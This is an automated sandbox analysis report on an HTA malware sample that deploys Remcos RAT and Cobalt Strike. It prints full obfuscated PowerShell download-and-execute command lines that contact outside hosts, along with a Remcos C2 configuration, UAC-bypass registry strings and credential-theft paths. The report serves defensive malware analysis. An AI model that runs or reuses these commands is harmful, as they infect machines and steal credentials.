Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta

Overview

General Information

Sample name:sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta
Analysis ID:1576453
MD5:920910732ff13da38fab9224e65041d6
SHA1:844226d370dc471fa282eaad9e8dabaf59963902
SHA256:7467651082b81c0e0ac5c64b4821fcd49070b5d15c88e1a716f948bdac88b544
Tags:htauser-lontze7
Infos:

Detection

Cobalt Strike, Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Cobalt Strike Beacon
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Yara detected obfuscated html page
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Abnormal high CPU Usage
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • mshta.exe (PID: 7060 cmdline: mshta.exe "C:\Users\user\Desktop\sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 6408 cmdline: "C:\Windows\system32\cmd.exe" "/C pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2916 cmdline: pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 1772 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xduntapu\xduntapu.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 404 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBE59.tmp" "c:\Users\user\AppData\Local\Temp\xduntapu\CSC441F3FFBBAD0418BBB746B4643CA251D.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • wscript.exe (PID: 792 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
          • powershell.exe (PID: 6312 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $antimagistrical = 'JGVmZm9ydGxlc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskY2FyZGlnYW5zID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskc3BoYWNlbGlhID0gJGNhcmRpZ2Fucy5Eb3dubG9hZERhdGEoJGVmZm9ydGxlc3MpOyRjb3NtZWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkc3BoYWNlbGlhKTskZG9vbXNheWVycyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmVzdGFnbmF0aW9uID0gJzw8QkFTRTY0X0VORD4+JzskS2FzaHViaWFuID0gJGNvc21lYS5JbmRleE9mKCRkb29tc2F5ZXJzKTskxZNjb25vbXVzID0gJGNvc21lYS5JbmRleE9mKCRyZXN0YWduYXRpb24pOyRLYXNodWJpYW4gLWdlIDAgLWFuZCAkxZNjb25vbXVzIC1ndCAkS2FzaHViaWFuOyRLYXNodWJpYW4gKz0gJGRvb21zYXllcnMuTGVuZ3RoOyRvdmVybW9kdWxhdGVkID0gJMWTY29ub211cyAtICRLYXNodWJpYW47JHJlZnJpZ2VyYXRvcnkgPSAkY29zbWVhLlN1YnN0cmluZygkS2FzaHViaWFuLCAkb3Zlcm1vZHVsYXRlZCk7JHVuYW5jaG9yZWQgPSAtam9pbiAoJHJlZnJpZ2VyYXRvcnkuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlZnJpZ2VyYXRvcnkuTGVuZ3RoKV07JHNwaXJpbGx1bXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR1bmFuY2hvcmVkKTskeHlsb2xpdGUgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRzcGlyaWxsdW1zKTskcGhvc3BoYXRpemVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHBob3NwaGF0aXplcy5JbnZva2UoJG51bGwsIEAoJzAvd21NdEgvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjZWRhcnMnLCAnJGNlZGFycycsICckY2VkYXJzJywgJ0Nhc1BvbCcsICckY2VkYXJzJywgJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJzEnLCckY2VkYXJzJywnJykpOw==';$periblem = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($antimagistrical));Invoke-Expression $periblem MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • CasPol.exe (PID: 6456 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": ["submarrine.duckdns.org:6946:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GH3PRL", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000C.00000002.4168215268.000000000258F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              0000000C.00000002.4163660136.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x6b6f8:$a1: Remcos restarted by watchdog!
              • 0x6bc70:$a3: %02i:%02i:%02i:%03i
              Click to see the 21 entries
              SourceRuleDescriptionAuthorStrings
              7.2.powershell.exe.63d2830.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                7.2.powershell.exe.63d2830.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  7.2.powershell.exe.63d2830.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    7.2.powershell.exe.63d2830.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6aaf8:$a1: Remcos restarted by watchdog!
                    • 0x6b070:$a3: %02i:%02i:%02i:%03i
                    7.2.powershell.exe.63d2830.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x64d94:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x64d10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64d10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x65210:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x65810:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x64e04:$str_b2: Executing file:
                    • 0x65c3c:$str_b3: GetDirectListeningPort
                    • 0x65600:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x65780:$str_b7: \update.vbs
                    • 0x64e2c:$str_b9: Downloaded file:
                    • 0x64e18:$str_b10: Downloading file:
                    • 0x64ebc:$str_b12: Failed to upload file:
                    • 0x65c04:$str_b13: StartForward
                    • 0x65c24:$str_b14: StopForward
                    • 0x656d8:$str_b15: fso.DeleteFile "
                    • 0x6566c:$str_b16: On Error Resume Next
                    • 0x65708:$str_b17: fso.DeleteFolder "
                    • 0x64eac:$str_b18: Uploaded file:
                    • 0x64e6c:$str_b19: Unable to delete:
                    • 0x656a0:$str_b20: while fso.FileExists("
                    • 0x65349:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 20 entries
                    SourceRuleDescriptionAuthorStrings
                    amsi32_6312.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                      amsi32_6312.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                        System Summary

                        barindex
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $antimagistrical = 'JGVmZm9ydGxlc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskY2FyZGlnYW5zID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskc3BoYWNlbGlhID0gJGNhcmRpZ2Fucy5Eb3dubG9hZERhdGEoJGVmZm9ydGxlc3MpOyRjb3NtZWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkc3BoYWNlbGlhKTskZG9vbXNheWVycyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmVzdGFnbmF0aW9uID0gJzw8QkFTRTY0X0VORD4+JzskS2FzaHViaWFuID0gJGNvc21lYS5JbmRleE9mKCRkb29tc2F5ZXJzKTskxZNjb25vbXVzID0gJGNvc21lYS5JbmRleE9mKCRyZXN0YWduYXRpb24pOyRLYXNodWJpYW4gLWdlIDAgLWFuZCAkxZNjb25vbXVzIC1ndCAkS2FzaHViaWFuOyRLYXNodWJpYW4gKz0gJGRvb21zYXllcnMuTGVuZ3RoOyRvdmVybW9kdWxhdGVkID0gJMWTY29ub211cyAtICRLYXNodWJpYW47JHJlZnJpZ2VyYXRvcnkgPSAkY29zbWVhLlN1YnN0cmluZygkS2FzaHViaWFuLCAkb3Zlcm1vZHVsYXRlZCk7JHVuYW5jaG9yZWQgPSAtam9pbiAoJHJlZnJpZ2VyYXRvcnkuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlZnJpZ2VyYXRvcnkuTGVuZ3RoKV07JHNwaXJpbGx1bXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR1bmFuY2hvcmVkKTskeHlsb2xpdGUgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRzcGlyaWxsdW1zKTskcGhvc3BoYXRpemVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHBob3NwaGF0aXplcy5JbnZva2UoJG51bGwsIEAoJzAvd21NdEgvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjZWRhcnMnLCAnJGNlZGFycycsICckY2VkYXJzJywgJ0Nhc1BvbCcsICckY2VkYXJzJywgJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJyRjZWRhcnMnLCckY2VkYXJzJywnJGNlZGFycycsJzEnLCckY2VkYXJzJywnJykpOw==';$periblem = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($antimagistrical));Invoke-Expression $periblem, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $antimagistrical = 'JGVmZm9ydGxlc3MgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskY2FyZGlnYW5zID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskc3BoYWNlbGlhID0gJGNhcmRpZ2Fucy5Eb3dubG9hZERhdGEoJGVmZm9ydGxlc3MpOyRjb3NtZWEgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkc3BoYWNlbGlhKTskZG9vbXNheWVycyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskcmVzdGFnbmF0aW9uID0gJzw8QkFTRTY0X0VORD4+JzskS2FzaHViaWFuID0gJGNvc21lYS5JbmRleE9mKCRkb29tc2F5ZXJzKTskxZNjb25vbXVzID0gJGNvc21lYS5JbmRleE9mKCRyZXN0YWduYXRpb24pOyRLYXNodWJpYW4gLWdlIDAgLWFuZCAkxZNjb25vbXVzIC1ndCAkS2FzaHViaWFuOyRLYXNodWJpYW4gKz0gJGRvb21zYXllcnMuTGVuZ3RoOyRvdmVybW9kdWxhdGVkID0gJMWTY29ub211cyAtICRLYXNodWJpYW47JHJlZnJpZ2VyYXRvcnkgPSAkY29zbWVhLlN1YnN0cmluZygkS2FzaHViaWFuLCAkb3Zlcm1vZHVsYXRlZCk7JHVuYW5jaG9yZWQgPSAtam9pbiAoJHJlZnJpZ2VyYXRvcnkuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlZnJpZ2VyYXRvcnkuTGVuZ3RoKV07JHNwaXJpbGx1bXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCR1bmFuY2hvcmVkKTskeHlsb2xpdGUgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRzcGlyaWxsdW1zKTskcGhvc3BoYXRpemVzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHBob3NwaGF0aXplcy5JbnZva2UoJG51bGwsIEAoJzAvd21NdEgvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjZWRh
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: pOwErSheLl -eX UNrEsTRiCTeD -nop -w 1 -c dEVicecReDENTiAlDePLoymENt ; iNvOkE-exPRESSion($(inVOke-eXpResSIOn('[sYSTeM.tEXt.ENcodInG]'+[cHar]58+[CHAr]58+'UTf8.gEtsTrInG([sYstem.cOnvErt]'+[chAR]0x3a+[cHAR]58+'fRomBASe64sTRiNG('+[chaR]34+'JEU2UjVuZzltV0sgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVyZEVGSU5JdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVWNYSWF1bmJwLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB3VCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2VibUNiUm9qWnksdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYVXRRSUt0TXdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOaFpXcnNRcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAielRXUFRRV3oiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lU3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUk1SYmloTWttdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRFNlI1bmc5bVdLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMjMuOTUuMjM1LjI5LzQzOS93ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzZm9ybWV0b2dldC50SUYiLCIkZU52OkFQUERBVEFcd2VhcmV1c2luZ2dvb2Rjb21wYW5pZXNmb3JnaWZpdGluZ2Jlc3RoaW5ncy52YlMiLDAsMCk7U3RhUnQtU2xlZXAoMyk7SU52T0tlLWV4UFJFc1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVx3ZWFyZXVzaW5nZ29vZGNvbXBhbmllc2ZvcmdpZml0aW5nYmVzdGhpbmdzLnZiUyI='+[CHar]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2916, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\weareusinggoodcompaniesforgifitingbesthings.vbS" , ProcessId: 792, ProcessName: wscript.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $antimagistrical = 